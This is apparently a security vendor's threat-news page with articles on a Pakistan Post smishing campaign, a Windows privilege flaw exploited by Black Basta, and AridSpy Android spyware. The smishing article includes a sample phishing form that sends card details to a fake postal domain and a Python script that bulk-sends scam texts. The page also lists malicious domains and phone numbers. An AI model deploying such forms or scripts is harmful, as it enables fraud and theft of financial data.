company logo

Product

Our Product

We are Reshaping the way Developers find and fix vulnerabilities before they get exploited.

Bulk IP/Domain Lookup

Threatspy

Solutions

By Industry

BFSI

Healthcare

Education

IT & Telecom

Government

By Role

CISO/CTO

DevOps Engineer

Resources

Resource Library

Get actionable insight straight from our threat Intel lab to keep you informed about the ever-changing Threat landscape.

Subscribe to Our Weekly Threat Digest

Company

Contact Us

Have queries, feedback or prospects? Get in touch and we shall be with you shortly.

loading..
loading..
loading..
Loading...

LockBit

Foxconn

Ransomware

loading..
loading..
loading..

Foxconn hit by a ransomware attack disrupting its Mexico's production

Foxconn confirmed to have suffered a ransomware attack targeting its Mexico's production line, meanwhile LockBit took the responsibility demanding ransom…

02-Jun-2022
3 min read

Related Articles

loading..

Trojan

Scam

Discover how the Smishing Triad's latest scheme targets Pakistan Post, exploitin...

A new wave of cybercrime has struck Pakistan as the notorious Smishing Triad expands its reach. This group's latest campaign targets unsuspecting mobile users, disguising as Pakistan Post to steal personal and financial information. Leveraging stolen data and sophisticated smishing tactics, they aim to exploit Pakistan's recent data breaches, marking a significant escalation in their global operations. The latest campaign targets Pakistan Post customers via iMessage and SMS. Previously, this group targeted users in the USA, EU, UAE, and KSA. ### Key Campaigns Documented - **UAE Federal Authority Impersonation**: During holidays, the Triad targeted UAE residents using the UAE Federal Authority for Identity and Citizenship. - **Emirates Post Smishing**: This campaign involved impersonating Emirates Post to deceive UAE citizens. - **USPS Smishing**: Targeted US citizens by impersonating the United States Postal Service (USPS). ![def80fc6eb0b3abf1ea0605333789490.png](https://sb-cms.s3.ap-south-1.amazonaws.com/def80fc6eb0b3abf1ea0605333789490_69330de27a.png) ***Data Trail (resecurity)*** ## Tactical Analysis ### Message Distribution and Delivery Mechanism The [Smishing Triad](https://www.resecurity.com/blog/article/smishing-triad-is-targeting-pakistan-to-defraud-banking-customers-at-scale) sends 50,000–100,000 malicious messages daily. These messages use databases of stolen personal data. The databases, often obtained from the dark web, contain phone numbers and other personal information. In Pakistan, the Triad has targeted customers of major mobile carriers like Jazz/Warid, Zong, Telenor Pakistan, and Ufone. ![a900a7a910364a6ba3a9a15524e32886.jpeg](https://sb-cms.s3.ap-south-1.amazonaws.com/a900a7a910364a6ba3a9a15524e32886_29fb47afb0.jpeg) ***iOS Message Distribution (resecurity)*** ### Attack Vectors and Techniques #### Malicious Messaging The primary vector involves sending SMS or iMessages that appear to be from Pakistan Post. These messages typically inform the recipient of a failed package delivery and prompt them to update their address via a link. #### Fake Websites Clicking the link redirects users to a fake website resembling Pakistan Post’s official site. This site asks for personal and financial details, ostensibly to cover redelivery fees. ### Smishing Kits and Technical Infrastructure #### Smishing Kit Code and Templates The smishing kits used by the Triad include consistent code and templates. These kits are highly sophisticated and automated, allowing large-scale message distribution. ```html <form action="https://fake-pakistan-post.com/verify" method="POST"> <label for="name">Name:</label> <input type="text" id="name" name="name"> <label for="credit_card">Credit Card:</label> <input type="text" id="credit_card" name="credit_card"> <button type="submit">Submit</button> </form> ``` #### Hosting and Domain Usage The domains used for these campaigns are frequently registered through anonymous services. Examples include: - **ep-gov-ppk.cyou** - **pk-post-goi.xyz** These domains are often registered via NameSilo, LLC, and utilize URL shortening services to obscure the malicious URLs. ![97b65b14a782c9d971acce38a118ff0f.png](https://sb-cms.s3.ap-south-1.amazonaws.com/97b65b14a782c9d971acce38a118ff0f_00bd770e60.png) ***phishing page (resecurity)** ### Automation Tools To process the stolen data at scale, the Triad uses various automation tools. These tools help in crafting and sending large volumes of smishing messages efficiently. ```python import requests def send_sms(phone_number, message): payload = {'to': phone_number, 'text': message} response = requests.post("https://sms-gateway.com/send", data=payload) return response.status_code phone_numbers = ["+923361021455", "+923301956704", "+923315640313"] message = "Your package delivery failed. Update your address at https://pk-post-goi.xyz" for number in phone_numbers: send_sms(number, message) ``` ## Mitigation and Prevention ### Telecom Operator Actions Telecom operators must enhance their fraud detection systems. Proactive measures include: - **Real-time message filtering**: Implement algorithms to detect and block suspicious messages. - **User alerts**: Inform users about the risks and provide guidelines on identifying fraudulent messages. ### National Cyber Emergency Response Team (PKCERT) PKCERT has issued [advisories](https://pkcert.gov.pk/wp-content/uploads/2024/05/Advisory-24-11.pdf) highlighting the patterns of smishing activities. They urge citizens to: - **Verify sources**: Confirm any message claiming to be from Pakistan Post through official channels. - **Avoid clicking links**: Do not click on links from unknown or suspicious messages. ## Attribution and Broader Context ### Chinese-Speaking Threat Actors The Smishing Triad is believed to consist of Chinese-speaking cybercriminals. Their activities align with previous patterns observed in different regions, targeting postal services and leveraging dark web data. ### Cross-Regional Activity The expansion to Pakistan is part of a broader strategy. Previous campaigns in the EU and the UAE show similar methods and targets. ### Indicators of Compromise (IOCs) Resecurity has provided several IOCs to aid in identifying and mitigating these threats: - **Domains**: - ep-gov-ppk.cyou - pk-post-goi.xyz - **URLs**: - l.ead.me/bf6fB8 - is.gd/bpEPk3 - **Phone Numbers**: - +923361021455 - +923301956704

loading..   15-Jun-2024
loading..   4 min read
loading..

Zero Day

Black Basta

CISA issues urgent alert on Windows vulnerability CVE-2024-26169 exploited by ra...

On March 12, 2024, Microsoft addressed a high-severity vulnerability, CVE-2024-26169, during its monthly Patch Tuesday updates. This vulnerability, stemming from an improper privilege management weakness in the Windows Error Reporting service, has been actively exploited by ransomware groups, particularly the Black Basta gang. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has since added this flaw to its catalog of actively exploited security bugs, urging immediate action. ## Understanding CVE-2024-26169 ### Technical Overview CVE-2024-26169 is a critical security flaw caused by improper privilege management in the Windows Error Reporting service. This flaw allows local attackers to gain SYSTEM permissions through low-complexity attacks that do not require user interaction. Such vulnerabilities are particularly dangerous as they provide attackers with elevated privileges, enabling them to execute arbitrary code, install programs, view, change, or delete data, or create new accounts with full user rights. ![Img1.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Img1_c7ac13f9a5.jpg) ***Sample instance code illustrating a potential exploit scenario*** This sample code highlights the type of manipulation that could be performed using elevated privileges obtained through this vulnerability. ### Exploitation and Timeline Symantec security researchers discovered that the Black Basta ransomware gang (also known as the Cardinal cybercrime group) exploited this vulnerability. They found evidence suggesting that the group had developed a working exploit as early as December 18, 2023. This implies that the attackers had a functional exploit at least 85 days before Microsoft released a patch. One with a compilation timestamp of February 27, 2024. Another built earlier, on December 18, 2023. The timestamps on the exploit tools indicated two primary builds: one from December 18, 2023, and another from February 27, 2024. Despite the possibility of tampering with these timestamps, Symantec believes the evidence is reliable. The early possession of the exploit by Black Basta signifies a considerable threat, given their history of targeting high-profile organizations. The timestamps, though potentially modifiable, suggest a prolonged period of exploitation, possibly spanning 85 days before Microsoft's patch release. **December 18, 2023:** Earliest known compilation of the exploit. **February 27, 2024:** Second compilation of the exploit. **March 12, 2024:** Microsoft releases Patch Tuesday updates addressing the vulnerability. **May 2024:** Symantec publishes findings linking Black Basta to the exploitation. ## Impact and Risks ### Affected Entities Black Basta has a notorious track record of breaching significant entities, including government contractors, healthcare giants, and critical infrastructure sectors. The exploitation of CVE-2024-26169 enables attackers to infiltrate systems with minimal effort, bypassing security measures and gaining control over sensitive data. ### Affected Entities Black Basta, active since April 2022, has a history of targeting high-profile organizations. Notable victims include: - Rheinmetall (German defense contractor) - Capita (UK technology outsourcing company) - Toronto Public Library - American Dental Association - ABB (government contractor) - Hyundai’s European division - Yellow Pages Canada - Ascension (US healthcare giant) ### System Compromise and Damage Potential The SYSTEM-level access provided by CVE-2024-26169 allows attackers to: - Execute arbitrary code - Install malware - Modify or delete data - Create new user accounts with full privileges The operational and financial damage from such attacks is profound, encompassing business disruption, data loss, and significant recovery costs. ### Potential Damage The SYSTEM-level access provided by this vulnerability allows attackers to execute ransomware attacks effectively. They can encrypt vital data, disrupt operations, and demand hefty ransoms. The financial and operational impact on affected organizations can be devastating, often leading to loss of business, reputational damage, and significant recovery costs. ### Federal Directives and Response In response to the exploitation of this vulnerability, CISA issued a directive mandating Federal Civilian Executive Branch (FCEB) agencies to secure their systems by July 4, 2024. This directive, while only binding for federal agencies, strongly urges all organizations to prioritize fixing this flaw to mitigate risks. ## Defensive Measures and Mitigation ### Immediate Actions Organizations must prioritize applying the March 2024 Patch Tuesday updates from Microsoft. These patches address the CVE-2024-26169 vulnerability, closing the exploit path for attackers. ### System Hardening Beyond patching, organizations should implement system hardening measures, including: 1. **Privilege Management**: Limit user privileges to the minimum necessary for their roles. Implement robust policies for managing elevated privileges. 2. **Monitoring and Detection**: Deploy advanced monitoring tools to detect unusual activities that could indicate exploitation attempts. 3. **Endpoint Protection**: Use comprehensive endpoint protection solutions to identify and block malicious activities. ### Long-term Strategies Organizations should adopt a multi-layered security approach to enhance their resilience against such vulnerabilities. Key strategies include: - **Regular Security Audits**: Conduct frequent security assessments to identify and address vulnerabilities. - **Employee Training**: Train employees on security best practices and phishing awareness to reduce the risk of social engineering attacks. - **Incident Response Planning**: Develop and regularly update incident response plans to ensure swift and effective responses to security breaches. ### Instance of Mitigation Below is a PowerShell script to check and ensure that the Windows Error Reporting service is properly configured and patched: ![Img2.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Img2_3ed7363bda.jpg) ***Verify and update Windows Error Reporting service*** This script ensures that the critical patch addressing CVE-2024-26169 is applied, thereby mitigating the risk of exploitation. The addition of CVE-2024-26169 to CISA's catalog of actively exploited vulnerabilities underscores the critical nature of this security flaw. The swift action required by federal agencies and recommended for all organizations highlights the severity of the threat posed by ransomware groups like Black Basta.

loading..   14-Jun-2024
loading..   5 min read
loading..

APT

Arid Viper's AridSpy malware targets Android users in Palestine & Egypt. This mu...

Arid Viper, also known as APT-C-23, Desert Falcons, or Two-tailed Scorpion, has been an active cyberespionage group since at least 2013. This group, primarily targeting Middle Eastern countries, has recently intensified its efforts in mobile espionage, particularly against Android users in Egypt and Palestine. SecureBlink threat researchers have thoroughly analyzed five ongoing campaigns employing a multistage Android spyware called AridSpy. This detailed analysis aims to dissect the technical nuances, methodologies, and implications of these campaigns. --- ### **Campaign Overview** The five identified campaigns primarily distribute AridSpy via dedicated websites impersonating legitimate applications. These include various messaging apps, a job opportunity app, and a Palestinian Civil Registry app. SecureBlink's telemetry detected six occurrences of AridSpy in Palestine and Egypt, indicating targeted espionage operations. ### **Distribution Mechanism** AridSpy is distributed through fake, but seemingly functional, Android applications. Victims are lured into downloading these apps from third-party websites, as these apps are not available on the Google Play Store. The distribution websites identified include: - lapizachat[.]com - reblychat[.]com - nortirchats[.]com - pariberychat[.]com (inactive) - renatchat[.]com (inactive) ### **Technical Nuances of AridSpy** 1. **Initial Access and Installation** Once a victim downloads the trojanized app, a JavaScript file named `myScript.js`, hosted on the same server, is executed. This script generates the correct download path for the malicious AridSpy payload. The script performs an AJAX request to `api.php` on the server, returning a specific file directory and name. The application installs as a legitimate app but secretly incorporates the first stage of AridSpy. The malware's first stage focuses on avoiding detection by security software and establishing initial communication with the Command & Control (C&C) server. 2. **Multistage Payload Delivery** Unlike its earlier single-stage version, AridSpy now operates as a multistage trojan. The initial app acts as a conduit, downloading and installing additional payloads from the C&C server. This approach helps in evading detection and ensures persistence. - **First-Stage Payload:** The first-stage payload is an AES-encrypted file downloaded from a hardcoded URL. This payload decrypts itself using a hardcoded key and requests the victim to install it manually. It masquerades as a legitimate Google Play services update. Once installed, it operates independently of the initial app. - **Second-Stage Payload:** Named `prefLog.dex`, the second-stage payload contains the main espionage functionalities. It is dynamically loaded and executed by the first-stage payload. This payload establishes a persistent connection with the C&C server, ready to receive commands and exfiltrate data. **Functional Analysis** 1. **Data Exfiltration** The primary goal of AridSpy is to exfiltrate sensitive user data. The malware is capable of: - Capturing images using the device's camera. - Recording audio from the microphone. - Accessing and uploading contact lists, SMS messages, call logs, and other personal data. - Monitoring app usage and collecting keystrokes. AridSpy employs various methods to avoid detection during data exfiltration. For instance, it only captures images when the device screen is turned on or off, ensuring the battery level is above 15% and a minimum of 40 minutes has passed since the last capture. 2. **Command and Control Communication** AridSpy communicates with its C&C server using Firebase for receiving commands and a separate hardcoded domain for data exfiltration. The C&C communication is designed to blend with normal network traffic to evade detection. For instance, it can deactivate itself by changing the exfiltration server to a benign-looking domain, making it less likely to be flagged by network security systems. 3. **Obfuscation Techniques** AridSpy uses trivial string obfuscation techniques where each string is converted from a character array. This method is consistent across all stages of the malware, complicating the reverse engineering process for security analysts. ### **Campaigns in Detail** 1. **LapizaChat Campaign** - **Website:** lapizachat[.]com - **Description:** This campaign used a trojanized version of the legitimate StealthChat app. The malicious version, modified on July 5th, 2023, and September 18th, 2023, included AridSpy code. - **Functionality:** The app provided legitimate messaging services while secretly installing AridSpy. 2. **NortirChat Campaign** - **Website:** nortirchats[.]com - **Description:** The NortirChat app, based on the legitimate Session messaging app, was modified and distributed with AridSpy code starting from March 19th, 2023. - **Functionality:** Similar to LapizaChat, it functioned as a messaging app while deploying AridSpy. 3. **ReblyChat Campaign** - **Website:** reblychat[.]com - **Description:** This campaign used a trojanized version of Voxer Walkie Talkie Messenger. The modified versions, dated June 8th, 2023, and June 11th, 2023, were distributed with AridSpy. - **Functionality:** It provided walkie-talkie communication features while performing espionage activities. 4. **Palestinian Civil Registry Campaign** - **Website:** palcivilreg[.]com - **Description:** This app claimed to offer information about Palestinian residents. It was advertised via a Facebook page and distributed a malicious app that communicated with the legitimate server for data retrieval. - **Functionality:** The app collected personal data under the guise of providing civil registry information. 5. **Job Opportunity App Campaign** - **Website:** almoshell[.]website - **Description:** This app purported to offer job opportunities. Unlike other campaigns, it was not based on a legitimate app but was designed from scratch to lure users into providing personal information. - **Functionality:** The app collected sensitive data during the job application process. **Attribution and Indicators of Compromise (IoCs)** SecureBlink also agrees to be attributed as AridSpy to the Arid Viper group with medium confidence. Key indicators include: - Targeting organizations in Palestine and Egypt, aligning with Arid Viper’s historical focus. - Use of the `myScript.js` JavaScript file across multiple campaigns, previously linked to Arid Viper. - The unique distribution method and code similarities to past campaigns, such as the FIFA World Cup in Qatar campaign. ---

loading..   13-Jun-2024
loading..   5 min read
Company Logo
logo

Secure Blink automates the application and API security testing for developers and security teams, helping them to rapidly identify and mitigate vulnerabilities more effectively than they can today.

Find Us Online

Facebook Logo
Twitter Logo
LinkedIn Logo
Telegram Logo
YouTube Logo
contact@secureblink.com

This website uses cookies to ensure you get the best experience on our website. By continuing on our website, you consent to our use of cookies. To find out more about how we use cookies, please see our Cookies Policy.

contact@secureblink.com

@ Copyright 2024 Secure Blink. All rights reserved.

4th Floor, Plot No- 7-10 Sector 126, Noida, UP -201303